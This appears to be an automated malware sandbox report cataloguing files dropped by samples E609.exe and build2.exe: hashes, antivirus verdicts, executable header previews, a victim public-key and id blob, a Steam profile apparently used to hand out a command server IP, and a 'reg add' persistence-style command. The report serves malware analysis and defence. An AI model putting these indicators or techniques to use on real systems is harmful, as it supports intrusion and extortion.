                                                                                              Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):108216
                                                                                              Entropy (8bit):4.007838653921864
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:ZzF9oonjxkUGgzOPjjk0+ACWHpfnzfNELYduJxP7pxoZsR1v9JNtFOOmdypfR3YO:LdkSzgrJvzMjhGiwGGnA3mFkiKmi1l+a
                                                                                              MD5:D3F1BF1BEA97AC0AB7111B97879E69FB
                                                                                              SHA1:6B811E6584EC10E303A066D7F944F4EFE99E778A
                                                                                              SHA-256:94FB7635706203A4409E1EFD33B7F3B641A6835C77BD5DF9167EE29F91E5EC4A
                                                                                              SHA-512:5875BE2961DB934062587A7836C282705A91BD64D85B2B5489B7F7AAF39188A6156F28AF338EEF34F68B31C50268081F3184FF08FF3D5D99ADFE48D9A1C9B165
                                                                                              Malicious:false
                                                                                              Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):35682
                                                                                              Entropy (8bit):5.380796323952844
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2S1:s78LtWYmwt5D0gqOac7PzzgiJmDzJtxB
                                                                                              MD5:FE777EE855868A4D298A66FFDC3CFC85
                                                                                              SHA1:BB8D28AC74655FCA4E836CA664D502EAA3A2BAB0
                                                                                              SHA-256:3BD9873A0DD4A5DE643332E412088BBB756D3374956948B7302EFD1A5059934A
                                                                                              SHA-512:ED35C87709C7821EB35C36D11DA656D6825078C73B175D96F6FC78024D753DDA6FC3CCD05442880C31C5CF0C99F1353C936C4B8943FC647F9758D7E68087B66A
                                                                                              Malicious:false
                                                                                              Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):232448
                                                                                              Entropy (8bit):7.222439676177051
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:xxr0DOihufZk6+IEs79tztiUKkfPucceIfEgSbMpOrq+nsu9wYS:x0oe6xBtEkfPuckcgSJ5nbCY
                                                                                              MD5:4F54B83888A62CDD3584C0A0FEE970D8
                                                                                              SHA1:AA281745AC08596281522253FD1A11CB57995B48
                                                                                              SHA-256:1932C3563AC01B8278F40493EF7D3F78413F4D5E86B9D1E0483001BB07654BC2
                                                                                              SHA-512:B370130012936E3DBB033FC53618F5134041841781C37E664DAADBEE82AE900933BA4A97354C0565F8531E31EEC62AC4DB06398E3719A18EFA4D3C93737D78A1
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 81%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.*.uuD.uuD.uuD.x'..muD.x'...uD.x'..RuD.|...ruD.uuE..uD....tuD.x'..tuD....tuD.RichuuD.................PE..L....._e.............................6............@.................................\6.......................................P..P.......(w...........................Q..............................`F..@...............\............................text............................... ..`.rdata...h.......j..................@..@.data...@ ...`.......J..............@....rsrc...(w.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):306688
                                                                                              Entropy (8bit):6.7250330334577075
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
                                                                                              MD5:41B883A061C95E9B9CB17D4CA50DE770
                                                                                              SHA1:1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
                                                                                              SHA-256:FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
                                                                                              SHA-512:CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 87%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):412
                                                                                              Entropy (8bit):4.653613298613219
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YdYwpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdXHD+CtrRQVctrRQVzRZQ3htrRQV/m0
                                                                                              MD5:12B97C50A3579B5DCC80CC67A1204294
                                                                                              SHA1:530B7C0DAA05B36B7C00CE1C16F9E6D9AAB27B1B
                                                                                              SHA-256:B8EF550D8DD485A0809E6E5EAE64F57C1E77410E3B97EF446927CC453952638A
                                                                                              SHA-512:BFB9D84A3DC2E7A6F98C16481A6D945628C04197C8FDAC1EE95D7DF6E1A273609E9B32C7E540D3EA9BC9F22D375E8361177E836825E228C8267AF41863D092E9
                                                                                              Malicious:false
                                                                                              Preview:{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):557
                                                                                              Entropy (8bit):6.017036102656592
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YGJ6838ONrD3LxM8OO+xst1zIBnzmKI15Y1/:YgJ38aX7KAGzm1q
                                                                                              MD5:C4C2A009303D43379B6505DAE754CB92
                                                                                              SHA1:FE20E38B05EEC237ED31B5D90115ED3EBA7B89FF
                                                                                              SHA-256:F0B8EA240CEA32D7AB9FD7E19E8F84B909DB34D44489226196C8830007B878ED
                                                                                              SHA-512:C9CDFFB3D5A41CAC27B357DC4B983D00EFE37DC9DC786409B9418704E2FDC57AE800E51904F31AC39B736EBC0C02F2E26F6ABEEC67A74D08DCBD6BAC5D5FD697
                                                                                              Malicious:false
                                                                                              Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}
                                                                                              Process:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):557
                                                                                              Entropy (8bit):6.017036102656592
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YGJ6838ONrD3LxM8OO+xst1zIBnzmKI15Y1/:YgJ38aX7KAGzm1q
                                                                                              MD5:C4C2A009303D43379B6505DAE754CB92
                                                                                              SHA1:FE20E38B05EEC237ED31B5D90115ED3EBA7B89FF
                                                                                              SHA-256:F0B8EA240CEA32D7AB9FD7E19E8F84B909DB34D44489226196C8830007B878ED
                                                                                              SHA-512:C9CDFFB3D5A41CAC27B357DC4B983D00EFE37DC9DC786409B9418704E2FDC57AE800E51904F31AC39B736EBC0C02F2E26F6ABEEC67A74D08DCBD6BAC5D5FD697
                                                                                              Malicious:false
                                                                                              Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}
                                                                                              Process:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):412
                                                                                              Entropy (8bit):4.653613298613219
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YdYwpHEx6useCtrESQVctrESQVzR4heQ3htrESQV/m0mQP2JSnVR:YdXHD+CtrRQVctrRQVzRZQ3htrRQV/m0
                                                                                              MD5:12B97C50A3579B5DCC80CC67A1204294
                                                                                              SHA1:530B7C0DAA05B36B7C00CE1C16F9E6D9AAB27B1B
                                                                                              SHA-256:B8EF550D8DD485A0809E6E5EAE64F57C1E77410E3B97EF446927CC453952638A
                                                                                              SHA-512:BFB9D84A3DC2E7A6F98C16481A6D945628C04197C8FDAC1EE95D7DF6E1A273609E9B32C7E540D3EA9BC9F22D375E8361177E836825E228C8267AF41863D092E9
                                                                                              Malicious:false
                                                                                              Preview:{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","city":"New york city","city_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","latitude":"40.713192","longitude":"-74.006065"}
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2459136
                                                                                              Entropy (8bit):6.052474106868353
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                              MD5:90E744829865D57082A7F452EDC90DE5
                                                                                              SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                              SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                              SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):679
                                                                                              Entropy (8bit):5.165420664591353
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:YWgc2TGBdeH+aBdeVAWRVtmXCH+2yrZMAdrKC8K/y8kEUq1HLxycXNNZW3c3Z:Yzc2TYAHtoAWRVMCHt0drc6UET
                                                                                              MD5:A8107106BEAEE159CABC5C8B05BC160B
                                                                                              SHA1:E6CCAF93C68BA8263D9E763C103E92D2664E519B
                                                                                              SHA-256:157F4F7E00941EE52B08537605AFFB5728A754348E66357403F84874CC45CAE9
                                                                                              SHA-512:8C82AB2BF541A32025C0C29A158734B869C4E6A8485ABB50076E267CEDC00DD42379B02F5C9F693AA7159A9968379382F0926AD96D6CC1AF2E3672E10238D17E
                                                                                              Malicious:false
                                                                                              Preview:{"serviceContext":{"serviceActivityId":"66523c64-43bd-476e-8fd7-fcd8e088b9c4","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"66523c64-43bd-476e-8fd7-fcd8e088b9c4|2024-05-25T19:30:44.0114600Z|fabric_msn|ESU|News_611"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false},"isPartial":false}
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):685392
                                                                                              Entropy (8bit):6.872871740790978
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):608080
                                                                                              Entropy (8bit):6.833616094889818
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):450024
                                                                                              Entropy (8bit):6.673992339875127
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2046288
                                                                                              Entropy (8bit):6.787733948558952
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):257872
                                                                                              Entropy (8bit):6.727482641240852
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):80880
                                                                                              Entropy (8bit):6.920480786566406
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):77
                                                                                              Entropy (8bit):4.90323175550411
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:u3Pvrmwqp2YR3sGJMGP5Rg5XQiKyMhF7n:uPzmg83JMuBi67
                                                                                              MD5:55CC761BF3429324E5A0095CAB002113
                                                                                              SHA1:2CC1EF4542A4E92D4158AB3978425D517FAFD16D
                                                                                              SHA-256:D6CCEB3C71B80403364BF142F2FA4624EE0BE36A49BAC25ED45A497CF1CE9C3A
                                                                                              SHA-512:33F9F5CAD22D291077787C7DF510806E4AC31F453D288712595AF6DEBE579FABED6CDF4662E46E6FA94DE135B161E739F55CFAE05C36C87AF85ED6A6AD1C9155
                                                                                              Malicious:false
                                                                                              Preview:reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):77
                                                                                              Entropy (8bit):4.90323175550411
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:u3Pvrmwqp2YR3sGJMGP5Rg5XQiKyMhF7n:uPzmg83JMuBi67
                                                                                              MD5:55CC761BF3429324E5A0095CAB002113
                                                                                              SHA1:2CC1EF4542A4E92D4158AB3978425D517FAFD16D
                                                                                              SHA-256:D6CCEB3C71B80403364BF142F2FA4624EE0BE36A49BAC25ED45A497CF1CE9C3A
                                                                                              SHA-512:33F9F5CAD22D291077787C7DF510806E4AC31F453D288712595AF6DEBE579FABED6CDF4662E46E6FA94DE135B161E739F55CFAE05C36C87AF85ED6A6AD1C9155
                                                                                              Malicious:false
                                                                                              Preview:reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):751104
                                                                                              Entropy (8bit):7.759444131721117
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:unvpi0XtAWoEn3O4WsiCIJdbUa0OWv4f5GWzH9MgInKa8fbM:unsk+4WxCIJJ6ef5PugIniTM
                                                                                              MD5:3EEDC2AE680453B8CA3B23FD15F529A7
                                                                                              SHA1:4B1CB1070C23BEA1ABDE90A6329CBF45059E8AE4
                                                                                              SHA-256:9BDB0941FB313CB0726068C73E28A31CFCDFD245E56666E6C86D78918EA85AEC
                                                                                              SHA-512:E9075B16347404B61DF5698BB055284F94F686ED318EA6F71B93E924AA25E19B2E27F516909EE9787B6BF9925320403DFF6D5825B3199EDBF2F46608A4E57D9B
                                                                                              Malicious:true
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*..Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5...Ko......Ko.5...Ko.Rich.Ko.........................PE..L...%9(d.....................\.......C............@..........................`......EO.......................................j..P.......h...........................Tj..............................`_..@...............l............................text............................... ..`.rdata..Hr.......t..................@..@.data...`........F...\..............@....rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1381
                                                                                              Entropy (8bit):4.893644520875933
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
